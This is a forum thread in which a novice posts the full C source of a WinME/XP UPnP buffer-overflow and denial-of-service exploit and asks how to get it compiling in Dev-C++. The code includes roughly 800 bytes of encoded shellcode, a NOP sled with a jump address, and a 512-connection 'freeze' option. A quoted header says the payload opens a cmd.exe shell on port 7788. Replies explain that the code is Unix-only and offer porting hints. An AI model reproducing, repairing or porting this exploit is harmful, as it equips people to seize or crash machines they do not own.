Help C++ application

Thread: Help C++ application

  1. #1
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795

    Help C++ application

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <sys/wait.h>
    #include <unistd.h>
    #include <fcntl.h>

    #define MAX 10000 // size of the sockfd[] array in main(): upper bound on simultaneously open sockets
    #define PORT 5000 // destination TCP port used for every connect() below
    #define FREEZE 512 // number of connections opened by the -f option
    #define NOP 0x43 //inc ebx, instead of 0x90

    /***************************************************************************/

    /*
     * Entry point.  The original header (quoted in post #4 of this thread)
     * describes this program as a UPnP DoS/overflow tool for WinME/XP on
     * TCP port 5000.  The code below is left byte-for-byte as posted; the
     * comments are review notes on portability and on the undefined
     * behaviour present in it.
     *
     * argv[1]  host name, resolved with gethostbyname()
     * argv[2]  option string: "-f" opens FREEZE connections and sends "XP"
     *          on each; "-e" opens one connection and sends the request
     *          buffer assembled below.
     * Returns 0 after closing the sockets; exits with 1 on a usage, lookup,
     * socket() or connect() failure and with 0 on a send() failure.
     *
     * Why it does not build in Dev-C++ (the question asked in this thread):
     * <netdb.h>, <netinet/in.h>, <sys/socket.h>, <sys/wait.h> and
     * <unistd.h> are POSIX/BSD-socket headers that a Win32 toolchain does
     * not ship, so the four "no such file or directory" errors in post #9
     * are the expected result; no directory or file is missing on the
     * user's side.
     */
    int main(int argc,char *argv[])
    {
    int sockfd[MAX]; // MAX (10000) ints of automatic storage, typically ~40 KB of stack
    char sendXP[]="XP"; // payload for the -f option
    char jmpcode[281], execode[840],request[2048]; // pieces of the -e request; request is the one actually sent
    char *send_buffer;
    // NOTE(review): num_socks, send_buffer and bindport are only assigned inside
    // the two option branches below.  If argv[2] contains neither "-f" nor "-e",
    // num_socks and send_buffer are read uninitialised in the loops that follow
    // (undefined behaviour); bindport is never assigned at all before it is used.
    int num_socks;
    int bindport;
    int i;
    int port; // unused
    
    // Opaque byte string supplied by the original author; not analysed or
    // verified here.  It is kept as a NUL-terminated string because strcat()
    // below copies it up to the first 0x00 byte.  Roughly 800 bytes
    // (50 lines of 16 plus a 4-byte tail).
    unsigned char shellcode[] =
    "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
    "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
    "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
    "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
    "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
    "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
    "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
    "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
    "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
    "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
    "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
    "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
    "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
    "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
    "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
    "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
    "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
    "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
    "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
    "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
    "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
    "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
    "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
    "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
    "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
    "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
    "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
    "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
    "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
    "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
    "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
    "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
    "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
    "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
    "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
    "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
    "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
    "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
    "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
    "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
    "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
    "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
    "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
    "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
    "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
    "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
    "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
    "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
    "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
    "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
    "\x68\x68\x68\x68";
    struct hostent *he;
    struct sockaddr_in their_addr;
    
    
    // Exactly two arguments are required; usage goes to stderr.
    if(argc!=3)
    {
    fprintf(stderr,"usage:%s <hostname> <command>\n",argv[0]);
    fprintf(stderr,"-f freeze the machine.\n");
    fprintf(stderr,"-e exploit.\n");
    exit(1);
    }
    
    
    // Option matching is a substring test, not strcmp(): "-f" anywhere in
    // argv[2] selects this branch.  The "-e" test below is a separate if, not
    // an else-if, so an argument containing both runs both branches and the
    // second one's assignments win.
    if(strstr(argv[2],"-f")) {
    num_socks=FREEZE; // 512 connections; sockfd[] has room for MAX
    send_buffer=sendXP;
    }
    
    if(strstr(argv[2],"-e")) {
    num_socks=1;
    send_buffer=request;
    bindport^=0x9797; // NOTE(review): bindport has not been assigned, so this reads an indeterminate value (undefined behaviour)
    shellcode[778]= (bindport) & 0xff; // the two bytes patched here are therefore unpredictable
    shellcode[779]= (bindport >> 8) & 0xff;
    
    // 268 bytes of NOP (0x43, see the #define) followed by a fixed 12-byte
    // tail; jmpcode[280] = 0 is the NUL terminator that snprintf() relies on.
    for(i = 0; i < 268; i++)
    jmpcode[i] = (char)NOP;
    
    jmpcode[268] = (char)0x4d;
    jmpcode[269] = (char)0x3f;
    jmpcode[270] = (char)0xe3;
    jmpcode[271] = (char)0x77;
    jmpcode[272] = (char)0x90;
    jmpcode[273] = (char)0x90;
    jmpcode[274] = (char)0x90;
    jmpcode[275] = (char)0x90;
    
    //jmp [ebx+0x64], jump to execute shellcode
    jmpcode[276] = (char)0xff;
    jmpcode[277] = (char)0x63;
    jmpcode[278] = (char)0x64;
    jmpcode[279] = (char)0x90;
    jmpcode[280] = (char)0x00;
    
    // 32 NOP bytes, a NUL at [32], then the payload appended with strcat().
    // strcat() takes char * while shellcode is unsigned char[], a
    // pointer-signedness mismatch (warning under -Wall).  Nothing checks the
    // result against sizeof execode (840): 32 + ~804 + NUL appears to fit,
    // but only because of the fixed payload size above.
    for(i = 0; i < 32; i++)
    execode[i] = (char)NOP;
    execode[32]=(char)0x00;
    strcat(execode, shellcode);
    
    // Bounded by the explicit 2048; a truncating return value (>= 2048) is not checked.
    snprintf(request, 2048, "%s%s\r\n\r\n", jmpcode, execode);
    }
    
    // Legacy resolver: IPv4 only and not thread-safe.  Its failures are
    // reported through h_errno rather than errno, so perror() here prints an
    // unrelated message (herror()/hstrerror() is the matching call).
    if((he=gethostbyname(argv[1]))==NULL)
    {
    perror("gethostbyname");
    exit(1);
    }
    
    
    /***************************************************************************/
    
    // One TCP socket per connection.  exit(1) on failure leaves the earlier
    // descriptors to be released by process exit.
    for(i=0; i<num_socks;i++)
    if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
    perror("socket"); exit(1);
    }
    
    
    their_addr.sin_family=AF_INET;
    their_addr.sin_port=htons(PORT);
    their_addr.sin_addr=*((struct in_addr*)he->h_addr); // only the first resolved address (h_addr == h_addr_list[0]) is used
    // bzero() is declared in <strings.h> on POSIX; glibc also exposes it via
    // <string.h>, which is presumably why the Slackware build in post #3 accepted it.
    bzero(&(their_addr.sin_zero),8);
    
    
    
    // sizeof(struct sockaddr) equals sizeof their_addr (16) for AF_INET.
    for(i=0; i<num_socks;i++)
    if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
    {
    perror("connect");
    exit(1);
    }
    
    
    // strlen() means each buffer is sent only up to its first NUL.  A failed
    // send() exits with status 0, which reports success to the shell and is
    // inconsistent with the exit(1) used for the other failures above.
    for(i=0; i<num_socks;i++)
    if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
    {
    perror("send");
    exit(0);
    }
    
    
    // close() return values are ignored.
    for(i=0; i<num_socks;i++)
    close(sockfd[i]);
    
    
    return 0;
    }
    Now when I go to the execute tab in Dev C++ and then compile, I get the following errors. My question is what do I need to do or modify to get this code to work. Make a file? Directory? I'm still very new to C++; all help is appreciated. Thank you, Computer Nerd22

  2. #2
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Haha! C++ "application", yes well, I never really considered a buffer-overflow exploit an application...

    Now when I go to execute tab in Dev C++, then compile I get the following errors.
    No errors? What's the problem then!?

    Besides, this seems like a unix prog which you're trying to build in windows (Dev C++ is windows right?). Find a Windows version or port it yourself.


    Ammo
    Credit travels up, blame travels down -- The Boss

  3. #3
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    I get the following errors.
    Which errors ??

    it compiled fine with my GCC (Slackware 9)

    But it might not be a really appropriate piece of source code !!
    with that shellcode and all..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  4. #4
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    /*
    * WinME/XP UPNP dos & overflow
    *
    * Run: ./XPloit host <option>
    *
    * Windows runs the "Universal Plug and Play technology" service
    * at port 5000. In the future this will allow for seamless
    * connectivity of various devices such as a printer.
    * This service has a DoS and a buffer overflow I exploit here.
    *
    * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
    *
    * Author: Gabriel Maggiotti
    * Email: gmaggiot@ciudad.com.ar
    * Webpage: http://qb0x.net
    */
    taken from packetstorm?
    yeah, I'm gonna need that by friday...

  5. #5
    Senior Member
    Join Date
    Jul 2002
    Posts
    315
    I would have to agree with ammo. Some of the syntax doesn't look right for a windows machine. In fact I compiled it and got about 102 errors after commenting out a few headers I figured are external.

    The errors seem to stem from the format of the shellcode.

    I hope that helps. If I could be of anymore help pm me.

    Guidance...
    - The mind is too beautiful to waste...
    Cutty


  6. #6
    Banned
    Join Date
    Mar 2002
    Posts
    594
    Now when I go to execute tab in Dev C++, then compile I get the following errors. My question is what do I need to do or modify to get this code to work. make a file? Directory? I'm still very new to C++ all help is appreciated thank you Computer Nerd22
    tampabay420, I don't think he was trying to claim it as his but thanks for pointing that out....

    And as for the source... I got lost halfway through...can't help you.

  7. #7
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    Originally posted here by jaguar291


    tampabay420, I don't think he was trying to claim it as his but thanks for pointing that out....

    And as for the source... I got lost halfway through...can't help you.
    maybe i should've made myself a bit more clear... I don't care who wrote it.. but it is an exploit... just pointing out which one, et cetera... sorry jag
    yeah, I'm gonna need that by friday...

  8. #8
    Senior Member
    Join Date
    Feb 2003
    Posts
    109
    For some reason I have found that gcc is much more lenient than most other c compilers because it doesn't compile strict ANSI by default. In ANSI C, you cannot have multi-line string literals. I shake my proverbial fist at all those sploit makers who don't realize that there are other compilers out there (even if gcc is better).
    $person!=$kiddie or die("Alas, die you hotmail hacker!!");
    SecureVision

  9. #9
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795
    Ok members heres the error's I get when trying to compile this exploit


    line 23 netdb.h no such file or directory
    line 25 netinet\in.h no such file or directory
    line 26 sys\socket.h no such file or directory
    line 27 sys\wait.h no such file or directory.


    Do I need to make a directory? A file? help thanks

  10. #10
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Ammo, IMHO, is exactly correct, this is what should clue you in:

    #include <sys/socket.h>

    This is what you will see whenever it is meant to be compiled in unix. Your mileage may vary on how well it works depending on which tcp/ip stack it was written for, but generally you are better off with a BSD style platform (ie, linux). Of course, if you know what you are doing you can always port it (like I sometimes have to for Solaris).

    If it had been a windows platform, you would see (or something to the effect):

    #include <winsock.h>

    Windows has its own socket stuff (winsock), go leave it to microsoft to do things differently huh? Unless something has changed that is...

    Anyway, my $0.02 are in ...

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)
